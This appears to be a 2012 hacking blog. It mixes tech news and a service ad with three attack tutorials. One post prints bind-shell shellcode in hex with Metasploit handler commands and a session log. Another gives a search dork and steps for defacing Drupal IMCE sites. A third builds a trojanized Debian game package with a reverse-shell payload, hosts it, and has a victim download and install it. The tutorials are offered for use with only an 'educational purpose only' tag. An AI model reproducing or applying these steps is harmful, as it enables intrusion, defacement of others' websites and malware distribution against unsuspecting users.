Saturday, 28 July 2012

3D tablet

Swipe Telecom launched a range of tablets here, including the country's "first 3D tablet".



The tablets are priced in the range of
Rs. 5,999
Rs. 6,999, while the one with phone facility is priced at
Rs. 8,999. The 3D tablet is called Swipe Tab X745 and is priced at
Rs. 5,999.
The company claims that these are the fastest and lightest devices in the category.


Key specs for Swipe Tab X745
  • Screen Size: 7"TFT Five Capacitive touch
  • Processor: Allwinner A13 Cortex A8@1.2GHZ-1.5GHZ,Mali-400 high-end GPU
  • RAM: 512MB DDR3
  • Display: 800X480 pixels
  • Camera: 2.0 megapixels
  • OS: Android Ice Cream Sandwich
  • Battery: 3200 mAh
  • Memory: 4GB and expandable up to 8GB

Tuesday, 24 July 2012

Heap hacking

HEAP SPRAYING USING NOP'S & IMMUNITY DEBUGGER

HI GUYS SEEKER HERE TODAY AFTER FEW DAYS OF STUDY AND RESEARCH I CAME UP WITH THIS NEW TRICK OF HACKING..


HEAP HACKING USING IMMUNITY DEBUGGER

What is this attack all about??

In this attack we will use IMMUNITY DEBUGGER to decipher NOP shellcode.So people who are new to hacking world might don't know what this NOP and IMMUNITY DEBUGGER are,so i will give a brief about both of them...

What is NOP?

No-operation instruction (NOP) and NOP slide.A NOP is an assembly instructionthat says, “Do nothing and move to the next instruction.” A NOP slide comprises multiple NOPs adjacent to each other in memory, basically taking up space. If a program’s execution flow encounters a series of NOP instructions, it will linearly “slide” down to the end of them to the next instruction. A NOP, in the Intel x86 architecture, has an opcode of 90, commonly seen in exploit code as \x90.

What is the use of NOP in heap spraying technique?

The heap spraying technique involves filling the heap with a known repeating pattern of NOP slides and your shellcode until you fill the entire memory space with this known value.You’ll recall that memory in the heap is dynamically allocated at program runtime. This is usually done via JavaScript,which causes the browser’s allocated memory to grow significantly. The attacker fills large blocks of memory with NOP slides and shellcode directly after them.When program execution flow is altered and randomly jumps somewhere into memory, there is a good chance of hitting a NOP slide and eventually hitting the shellcode and once the victim hits the shell code he/she is exploited and we get his command shell..

How NOP Slide means in the shell code??

In the above snapshot you can see the hexadecimal representation of \x90, the Intel x86 architecture opcode. A 90 in Intel x86 assembly is a NOP. Here you see a series of \x90s that create our NOP-slide effect. The rest of the code is the payload, such as a reverse shell or a Meterpreter shell.

What is IMMUNITY DEBUGGER?

Here to understand NOP Slide we will use IMMUNITY DEBUGGER but before doing that you should know what immunity debugger is.On your Windows XP target, download and install Immunity Debugger from http://www.immunityinc.com/.
Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. A debugger with functionality designed specifically for the security industry Cuts exploit development time by 50% Simple, understandable interfaces Robust and powerful scripting language for automating intelligent debugging Lightweight and fast debugging to prevent corruption during complex analysis Connectivity to fuzzers and exploit development tools.

LETS START THE HACKING!!!!

1 seeker@bt#msfpayload windows/shell/bind_tcp LPORT=443 E 
////use the msfpayload command to generate sample shellcode for a simple TCP bind shell, listening on port 443 ..when this command is executed it generates two shellcodes stage 1 and 2
here we are concerned with just stage1 shell code because metasploit will help us sending stage 2 code when we connect to it ////
2  Copy and paste the shellcode from stage 1 into a text editor .You’ll need to do some editing before proceeding. Now that you have your basic shellcode, add as many NOPs as you want to the beginning of it (such as \x90\x90\x90\x90\x90). Then remove all \x occurrences so it looks similar to the below snapshot.
 
909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090f
ce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f0
52578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c
738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe058
5f5a8b12eb865d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504
050405068ea0fdfe0ffd59731db5368020001bb89e66a10565768c2db3767ffd5535768b7e938ffffd553535768
74ec3be1ffd5579768756e4d61ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5f
fd593536a005653576802d9c85fffd501c329c685f675ecc3
3 Now in your victim machine install immunity debugger and open any executable here we are exploiting browser so we will user iexplore.exe from :-
FILE -> OPEN -> and the path where your iexplore.exe is
You should see a number of assembly instructions in the main window .Left-click the first       instruction on the screen, and hold down SHIFT while left-clicking to highlight some instructions below it.
5 Copy the shellcode from your text file generated from msfpayload, and right-click in the Immunity Debugger window and choose Binary->Binary paste. This will paste the assembly instructions from the our text file into the Immunity Debugger window .
 

When we first exported our shellcode in a bind_tcp format, the last instruction through stage 1 ended with ecc3. Locate the last set of memory instructions we added ending in ecc3. Right after the ecc3, press F2 to create a breakpoint and at the starting of our shell code press F2 to create breakpoint.

Open up a command prompt and type netstat -an. Nothing should be listening on 443, and this is a good sign that your payload hasn’t executed yet.

8 seeker@bt3# msfcli multi/handler PAYLOAD=windows/shell/bind_tcp RHOST=192.168.57.82 LPORT=443 E


///WE USE THIS COMMAND TO CREATE THE LISTENER ON PORT 443 WHICH WILL CONNECT THE STAGE 2 WITH THE STAGE 1 LISTENER///



9 NOW PRESS F9 IN THE IMMUNITY HANDLER AND BINGOOOO IT RUNS THE SHELL CODE AND WE GET THE COMMAND SHELL OF THE VICTIM..


msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.57.73:60463 -> 192.168.57.82:443)



/////EDUCATIONAL PURPOSE ONLY////
 

Sunday, 22 July 2012

Durpal IMCE Website Hacking


 Google Dork: inurl:"/imce?dir="

 

 

 

 

 

 

 

Find a vulnerable website:

Now Navigate To Folders Like Root etc
Click Upload

Select A Html Or Php Deface Page

Click Upload


Now you can acess ur defaced page








  
 Note:Some Sites May Only Accept .Jpg Or .Png Formats

Thursday, 12 July 2012

Yahoo hack leaks 453000 unencrypted passwords

A previously unknown hacker group has

posted online the details of 450,000 user accounts

and passwords it claims to have taken from a Yahoo server.


A Yahoo spokesperson in Singapore declined to comment.

The affected accounts appeared to belong to a Voice over Internet Protocol (VoIP) service called Yahoo Voices...

form More Visit

This page

Tuesday, 10 July 2012

Ethical Hacking in ludhiana

::::: Recover your Hacked Facebook Account Page, Email Id or Website  ::::::

Investigate cyber case


With

Cyber Crime Investigator

Team

T.A.C Security Solutions

Ludhiana , Punjab , India.

Ethical Hacker in ludhiana

::::: Recover your Hacked Facebook Account Page, Email Id or Website  ::::::

Investigate cyber case


With

Cyber Crime Investigator

Team

T.A.C Security Solutions

Ludhiana , Punjab , India.

Tuesday, 3 July 2012

Who is the owner of Facebook?

Facebook is not Mark Zuckerberg's - Said By Indian

A 28 year old, Divya Narendra, son of an Indian immigrant doctor couple in the U.S., has moved to courtroom in battle with Facebook CEO Mark Zuckerberg. He believes that he, and not Mark Zuckerberg, came up with the idea of social networking website Facebook.

Narendra, along with his former Harvard University classmates Tyler Winklevoss and Cameron Winklevoss, has charged Zuckerberg with stealing the idea they conceived over a year, when they were students at Harvard University.




"I spent almost one year developing the concept and searching for programmers (along with the Winklevoss twins) to build what was then called Harvard-Connection.com (a social network for Harvard students which was to expand to other schools). When I heard about Mark Zuckerberg for the first time in the fall of 2003, he seemed like a natural fit to join our team. Three months later, Facebook launched and all the time and effort I had put into my vision had been taken away," Narendra said.

He and the twins first tried to convince Harvard's administrative board and president (Larry Summers) to take action against Zuckerberg. But they had to file a lawsuit as the matter was outside the jurisdiction of the university. While an initial settlement had been reached in the suit, reportedly at $65 million, it was reopened in May 2010. If the current suit goes in favour of Narendra and his friends, the value of the settlement could escalate to about $466 million.


Who is the owner of Facebook?



must comment

Monday, 2 July 2012

LINUX IS not SECURE virus for linux

WHO SAY LINUX IS SECURE (VIRUS FOR LINUX)

TODAY I WILL SHOW U 100% WORKING VIRUS FOR LINUX.....AND HOW TO CREATE IT FROM BACKTRACK ;;;;

PEOPLE WHO THINK THAT VIRUSES AND TROJANS ARE FOR WINDOWS ONLY HERE I GIVE U THE VIRUS PACKAGE FOR LINUX...

First we need to download the package that i will infect and move it to a temporary working directory. In my example, i will use the package 'freesweep',

1 seeker@bt#apt-get --download-only -install freesweep  

 //this command downloads the freesweep package ///

2 seeker@bt#mkdir /tmp/evil  

//this command is use to create directory evil in temp directory///


3 seeker@bt# mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /tmp/evil

//this command will move the freesweep package from archives to evil directory//

4 seeker@bt# cd /tmp/evil/


5 seeker@bt:/tmp/evil#dpkg -x freesweep_0.90-2_i386.deb work

 //this command will extract the package to a working directory//


6 seeker@bt:/tmp/evil#mkdir work/DEBIAN

///Now we need to create a DEBIAN directory to hold our additional added features. ///


7 seeker@bt:/tmp/evil/work/DEBIAN#vi control 

//In the 'DEBIAN' directory, create a file named 'control' that contains the following data as shown in snapshot//



8 seeker@bt:/tmp/evil/work/DEBIAN#vi postinst

// this command creates a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following data as shown in snapshot//





9 seeker@bt#msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.57.78  LPORT=443 X >
/tmp/evil/work/usr/games/freesweep


////this command is used to create a malicious payload that uses a  reverse shell to connect back to us named freesweep////



10 seeker@bt:/tmp/evil/work/DEBIAN#chmod 755 postinst

//in this command we make our script executable//


11 seeker@bt:/tmp/evil/work/DEBIAN#dpkg-deb --build /tmp/evil/work

//this command is used to build our new package work.deb///


12 seeker@bt:/tmp/evil#mv work.deb freesweep.deb

//change that to freesweep.deb //

13 seeker@bt:/tmp/evil#cp freesweep.deb /var /www/

//now we copy our malicious package to www directory to host it on apache///

14 seeker@bt:/tmp/evil#service apache2 start

//this command is used to start the apache service/// 




15 seeker@bt#msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp  LHOST=192.168.57.78 LPORT=443 E

//now we will  set up the Metasploit multi/handler to receive the incoming connection.//

16 ///in this step we convice our UBUNTU  victim to download the package (game) and install that package .////


victim@ubuntu:~$ wget http://192.168.57.78/freesweep.deb

victim@ubuntu:~$ sudo dpkg -i freesweep.deb
 

//NOW WHEN USER INSTALL OUR GAME WE GET THE COMMAND LINE SESSION//

 
 
 
 

 1000% WORKING

//EDUCATIONAL PURPOSE ONLY :)
Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant